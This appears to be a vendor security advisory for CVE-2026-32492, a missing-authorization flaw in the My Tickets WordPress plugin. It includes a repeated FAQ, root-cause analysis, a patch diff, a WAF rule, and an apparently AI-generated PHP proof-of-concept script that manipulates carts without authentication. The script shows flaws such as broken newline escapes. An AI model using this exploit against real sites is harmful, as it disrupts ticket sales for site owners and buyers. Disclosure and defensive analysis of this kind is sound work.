What is CVE-2026-32492?

CVE-2026-32492 is a vulnerability in the My Tickets – Accessible Event Ticketing plugin for WordPress that allows unauthorized access due to a missing authorization check. This flaw enables unauthenticated attackers to perform actions such as manipulating shopping cart contents.

How does the vulnerability work?

The vulnerability arises from the `mt_ajax_handler()` function, which processes AJAX requests without verifying user permissions. Attackers can send crafted requests to the server to exploit this flaw and perform unauthorized actions like adding tickets to a cart.

Who is affected by this vulnerability?

Any WordPress site using the My Tickets plugin version 2.1.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the My Tickets plugin in your WordPress admin panel. If it is version 2.1.1 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability is patched in version 2.1.2 of the My Tickets plugin. Administrators should update to this version or later to mitigate the risk associated with CVE-2026-32492.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions affecting the integrity of the ticketing system.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to manipulate shopping cart contents, potentially leading to denial of service or disruption of ticket sales. While it does not expose sensitive data, it undermines the integrity of the ticketing process.

What is the proof of concept for this vulnerability?

The proof of concept provided demonstrates how an attacker can send a crafted POST request to the vulnerable endpoint, allowing them to add tickets to a shopping cart without authorization. This illustrates the ease with which the vulnerability can be exploited.

What measures can I take to mitigate the risk?

In addition to updating the plugin, administrators should regularly review user permissions and implement security measures such as web application firewalls to monitor and block suspicious activities.

Is there a way to temporarily protect my site until I can update?

While the best solution is to update the plugin, you can temporarily disable the My Tickets plugin to prevent any unauthorized actions until the update can be applied.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately disable the My Tickets plugin, review server logs for unauthorized activities, and consider restoring from a backup if necessary. Additionally, assess user accounts for any unauthorized changes.

Where can I find more information on this vulnerability?

More information can be found in the official CVE database and security advisories related to the My Tickets plugin. Additionally, WordPress security forums and blogs often provide updates and discussions on vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 30, 2026

CVE-2026-32492: My Tickets – Accessible Event Ticketing <= 2.1.1 – Missing Authorization (my-tickets)

CVE ID CVE-2026-32492

Plugin my-tickets

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.1.1

Patched Version 2.1.2

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32492:
This vulnerability is a Missing Authorization flaw in the My Tickets – Accessible Event Ticketing WordPress plugin. The plugin fails to verify user permissions before processing certain AJAX requests, allowing unauthenticated attackers to perform unauthorized actions. The CVSS score of 5.3 indicates a medium severity impact.

The root cause is the absence of a capability check in the `mt_ajax_handler()` function within `/my-tickets/mt-ajax.php`. The function processes AJAX requests for the `add_to_cart` action without validating if the requesting user has appropriate permissions. The vulnerable code path begins at line 81 where the function receives and processes `$_REQUEST[‘function’]` data. The `add_to_cart` case (line 81-163) directly manipulates the shopping cart and ticket purchase data without any authorization verification.

Exploitation involves sending a crafted POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `mt_ajax_handler` and the `function` parameter set to `add_to_cart`. Attackers can include additional parameters like `mt_tickets` and `mt_event_id` to manipulate cart contents. The request bypasses WordPress nonce verification since the vulnerable function does not check `wp_verify_nonce()` for this action. Attackers can repeatedly trigger this endpoint to affect ticket availability and purchase flows.

The patch introduces a transaction lock mechanism using WordPress transients but does not add the missing authorization check. In `/my-tickets/mt-ajax.php`, lines 81-90 now create a lock based on `$_REQUEST[‘mt-cart-nonce’]` and check for an existing lock with `get_transient()`. If a lock exists, the function returns an error. The lock is set for 5 seconds with `set_transient()` and deleted after processing with `delete_transient()`. This prevents concurrent requests but does not address the core authorization flaw. The version number updates from 2.1.1 to 2.1.2.

Successful exploitation allows unauthenticated attackers to manipulate shopping cart contents and ticket purchase data. Attackers can add or remove tickets from carts, potentially affecting ticket availability for legitimate users. This could lead to denial of service by locking tickets in carts or disrupting event ticket sales. The vulnerability does not directly expose sensitive data or enable remote code execution, but it impacts the integrity of the ticketing system.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/my-tickets/mt-ajax.php
+++ b/my-tickets/mt-ajax.php
@@ -81,6 +81,15 @@
 		$data = map_deep( $data, 'sanitize_text_field' );
 		// reformat request data to multidimensional array.
 		$cart = mt_get_cart();
+		$lock = 'mt_add_to_cart_lock_' . sanitize_text_field( $_REQUEST['mt-cart-nonce'] );
+		if ( get_transient( $lock ) ) {
+			$return = array(
+				'response' => esc_html__( 'Another transaction is currently processing. Please try again shortly.', 'my-tickets' ),
+				'success'  => 0,
+			);
+			wp_send_json( $return );
+		}
+		set_transient( $lock, 1, 5 );

 		foreach ( $data as $k => $d ) {
 			if ( 'mt_tickets' === $k ) {
@@ -163,6 +172,7 @@
 			'event_id' => $submit['mt_event_id'],
 			'data'     => $count,
 		);
+		delete_transient( $lock );
 		wp_send_json( $return );
 	}
 	if ( 'save_address' === $_REQUEST['function'] ) {
--- a/my-tickets/mt-notifications.php
+++ b/my-tickets/mt-notifications.php
@@ -769,7 +769,7 @@
 	if ( function_exists( 'mc_draw_template' ) ) {
 		return mc_draw_template( $data, $template );
 	} else {
-		$template = stripcslashes( $template );
+		$template = wp_unslash( $template );
 		// If there are no brace characters, there is nothing to replace.
 		if ( strpos( $template, '{' ) === false ) {
 			return trim( $template );
@@ -802,7 +802,7 @@
 							}
 						}
 					} else { // don't do preg match (never required for RSS).
-						$template = stripcslashes( str_replace( '{' . $key . '}', $value, $template ) );
+						$template = wp_unslash( str_replace( '{' . $key . '}', $value, $template ) );
 					}
 				} // end {$key check.
 			}
--- a/my-tickets/mt-receipt.php
+++ b/my-tickets/mt-receipt.php
@@ -27,7 +27,7 @@
 				$nonce       = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : false;
 				$verify      = wp_verify_nonce( $nonce, 'mt-verify-email' );
 				$email       = sanitize_text_field( $_POST['mt-verify-email'] );
-				$is_verified = ( $verify && $email === get_post_meta( $receipt->ID, '_email', true ) ) ? true : false;
+				$is_verified = ( $verify && get_post_meta( $receipt->ID, '_email', true ) === $email ) ? true : false;
 			}
 			$cookie_receipt = ( isset( $_COOKIE['mt_purchase_receipt'] ) ) ? $_COOKIE['mt_purchase_receipt'] : false;
 			// Allow conditions: within 10 minutes of purchase & browser has a matching cookie; current user can view reports; user has verified email.
--- a/my-tickets/mt-verify.php
+++ b/my-tickets/mt-verify.php
@@ -8,40 +8,41 @@
  * @license  GPLv3
  * @link     https://www.joedolson.com/my-tickets/
  */
+
 $options  = mt_get_settings();
 $post_url = add_query_arg( 'receipt_id', mt_get_receipt_id(), get_permalink( $options['mt_receipt_page'] ) );
 get_header()
-	?>
-		<style>
-			.mt-entry { width: 100%; max-width: 1080px; padding: 1rem; margin: 0 auto; }
-			.verify-data form { display: flex; align-items: end; }
-			.mt-error { padding: .5rem; outline: 2px solid currentColor; margin-bottom: 1rem; }
-		</style>
-		<article class="mt-entry entry-content">
-			<h1 class='entry-title'><?php esc_html_e( 'Verify your purchase email', 'my-tickets' ); ?></h1>
-			<div class="entry-content">
-				<div class="verify-data">
-					<?php
-					if ( isset( $_POST['mt-verify-email'] ) ) {
-						?>
-						<div class="mt-error">
-							<p><?php esc_html_e( 'Sorry! That email address does not match our records for this purchase.', 'my-tickets' ); ?></p>
-						</div>
-						<?php
-					}
+?>
+	<style>
+		.mt-entry { width: 100%; max-width: 1080px; padding: 1rem; margin: 0 auto; }
+		.verify-data form { display: flex; align-items: end; }
+		.mt-error { padding: .5rem; outline: 2px solid currentColor; margin-bottom: 1rem; }
+	</style>
+	<article class="mt-entry entry-content">
+		<h1 class='entry-title'><?php esc_html_e( 'Verify your purchase email', 'my-tickets' ); ?></h1>
+		<div class="entry-content">
+			<div class="verify-data">
+				<?php
+				if ( isset( $_POST['mt-verify-email'] ) ) {
 					?>
-					<form action="<?php echo esc_url( $post_url ); ?>" method="post">
-						<?php wp_nonce_field( 'mt-verify-email' ); ?>
-						<p>
-							<label for="mt-verify-email"><?php esc_html_e( 'Your Email', 'my-tickets' ); ?></label><br />
-							<input type="email" id="mt-verify-email" name="mt-verify-email" autocomplete="email" required />
-						</p>
-						<p>
-							<button type="submit"><?php esc_html_e( 'Submit', 'my-tickets' ); ?></button>
-						</p>
-					</form>
-				</div>
+					<div class="mt-error">
+						<p><?php esc_html_e( 'Sorry! That email address does not match our records for this purchase.', 'my-tickets' ); ?></p>
+					</div>
+					<?php
+				}
+				?>
+				<form action="<?php echo esc_url( $post_url ); ?>" method="post">
+					<?php wp_nonce_field( 'mt-verify-email' ); ?>
+					<p>
+						<label for="mt-verify-email"><?php esc_html_e( 'Your Email', 'my-tickets' ); ?></label><br />
+						<input type="email" id="mt-verify-email" name="mt-verify-email" autocomplete="email" required />
+					</p>
+					<p>
+						<button type="submit"><?php esc_html_e( 'Submit', 'my-tickets' ); ?></button>
+					</p>
+				</form>
 			</div>
-		</article>
-	<?php
+		</div>
+	</article>
+<?php
 get_footer();
--- a/my-tickets/my-tickets.php
+++ b/my-tickets/my-tickets.php
@@ -4,7 +4,7 @@
  *
  * @package     My Tickets - Accessible Event Ticketing
  * @author      Joe Dolson
- * @copyright   2014-2025 Joe Dolson
+ * @copyright   2014-2026 Joe Dolson
  * @license     GPL-2.0+
  *
  * @wordpress-plugin
@@ -17,11 +17,11 @@
  * License:     GPL-2.0+
  * License URI: http://www.gnu.org/license/gpl-2.0.txt
  * Domain Path: lang
- * Version:     2.1.1
+ * Version:     2.1.2
  */

 /*
-	Copyright 2014-2025  Joe Dolson (email : joe@joedolson.com)
+	Copyright 2014-2026  Joe Dolson (email : joe@joedolson.com)

 	This program is free software; you can redistribute it and/or modify
 	it under the terms of the GNU General Public License as published by
@@ -44,7 +44,7 @@
  * @return string Current My Tickets version.
  */
 function mt_get_current_version() {
-	$mt_version = '2.1.1';
+	$mt_version = '2.1.2';

 	return $mt_version;
 }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-32492
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10032492,phase:2,deny,status:403,chain,msg:'CVE-2026-32492 via My Tickets AJAX - Missing Authorization',severity:'MEDIUM',tag:'CVE-2026-32492',tag:'WordPress',tag:'Plugin-MyTickets'"
  SecRule ARGS_POST:action "@streq mt_ajax_handler" "chain"
    SecRule ARGS_POST:function "@streq add_to_cart" "chain"
      SecRule &ARGS_POST:mt-cart-nonce "@eq 0" 
        "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.cve_2026_32492_block=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32492 - My Tickets – Accessible Event Ticketing <= 2.1.1 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Craft the exploit payload
$post_data = array(
    'action' => 'mt_ajax_handler',
    'function' => 'add_to_cart',
    'mt_tickets' => array(
        'event_id' => '123', // Replace with actual event ID
        'ticket_type' => 'general',
        'quantity' => '5'
    ),
    'mt_event_id' => '123', // Must match event_id in mt_tickets
    'mt-cart-nonce' => 'exploit_nonce' // Nonce is not verified in vulnerable versions
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code === 200) {
    echo "[+] Exploit sent successfully.n";
    echo "[+] Response: " . $response . "n";
    
    // Parse JSON response to verify success
    $json_response = json_decode($response, true);
    if (isset($json_response['success']) && $json_response['success'] == 1) {
        echo "[+] Cart manipulation confirmed!n";
    } else {
        echo "[-] Cart manipulation may have failed.n";
    }
} else {
    echo "[-] Request failed with HTTP code: " . $http_code . "n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-32492?
Overview of the vulnerability
CVE-2026-32492 is a vulnerability in the My Tickets – Accessible Event Ticketing plugin for WordPress that allows unauthorized access due to a missing authorization check. This flaw enables unauthenticated attackers to perform actions such as manipulating shopping cart contents.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `mt_ajax_handler()` function, which processes AJAX requests without verifying user permissions. Attackers can send crafted requests to the server to exploit this flaw and perform unauthorized actions like adding tickets to a cart.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the My Tickets plugin version 2.1.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the My Tickets plugin in your WordPress admin panel. If it is version 2.1.1 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.1.2 of the My Tickets plugin. Administrators should update to this version or later to mitigate the risk associated with CVE-2026-32492.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions affecting the integrity of the ticketing system.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability could allow attackers to manipulate shopping cart contents, potentially leading to denial of service or disruption of ticket sales. While it does not expose sensitive data, it undermines the integrity of the ticketing process.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept provided demonstrates how an attacker can send a crafted POST request to the vulnerable endpoint, allowing them to add tickets to a shopping cart without authorization. This illustrates the ease with which the vulnerability can be exploited.
What measures can I take to mitigate the risk?
Additional security practices
In addition to updating the plugin, administrators should regularly review user permissions and implement security measures such as web application firewalls to monitor and block suspicious activities.
Is there a way to temporarily protect my site until I can update?
Interim security measures
While the best solution is to update the plugin, you can temporarily disable the My Tickets plugin to prevent any unauthorized actions until the update can be applied.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect exploitation, immediately disable the My Tickets plugin, review server logs for unauthorized activities, and consider restoring from a backup if necessary. Additionally, assess user accounts for any unauthorized changes.
Where can I find more information on this vulnerability?
Resources for further reading
More information can be found in the official CVE database and security advisories related to the My Tickets plugin. Additionally, WordPress security forums and blogs often provide updates and discussions on vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations